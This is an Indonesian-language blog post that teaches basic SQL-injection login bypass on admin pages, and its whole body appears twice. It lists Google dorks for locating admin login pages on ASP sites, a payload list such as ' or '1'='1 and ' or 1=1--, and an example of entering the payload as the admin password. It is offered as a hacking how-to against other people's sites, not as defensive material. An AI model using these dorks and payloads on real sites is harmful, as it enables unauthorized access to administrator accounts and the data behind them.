sql injection yang paling dasar Mendapatkan auth bypass di account admin.
Kebanyakan situs rentan terhadap ini.
- Pertama kita perlu menemukan situs
- mulailah dengan membuka google.
Dork :
"Inurl: admin.asp"
"Inurl: login / admin.asp"
"Inurl: admin / login.asp"
"Inurl: adminlogin.asp"
"Inurl: adminhome.asp"
"Inurl: admin_login.asp"
"Inurl: administratorlogin.asp"
"Inurl: login / administrator.asp"
"Inurl: administrator_login.asp"
ini adalah daftar sql injection
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
jadi nanti di isikan seperti ini, contoh :
username: Admin
password: 'or'1' = '1
Tidak semua site lemah pake ginian :)
Kebanyakan situs rentan terhadap ini.
- Pertama kita perlu menemukan situs
- mulailah dengan membuka google.
Dork :
"Inurl: admin.asp"
"Inurl: login / admin.asp"
"Inurl: admin / login.asp"
"Inurl: adminlogin.asp"
"Inurl: adminhome.asp"
"Inurl: admin_login.asp"
"Inurl: administratorlogin.asp"
"Inurl: login / administrator.asp"
"Inurl: administrator_login.asp"
ini adalah daftar sql injection
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
jadi nanti di isikan seperti ini, contoh :
username: Admin
password: 'or'1' = '1
Tidak semua site lemah pake ginian :)
Tidak ada komentar:
Posting Komentar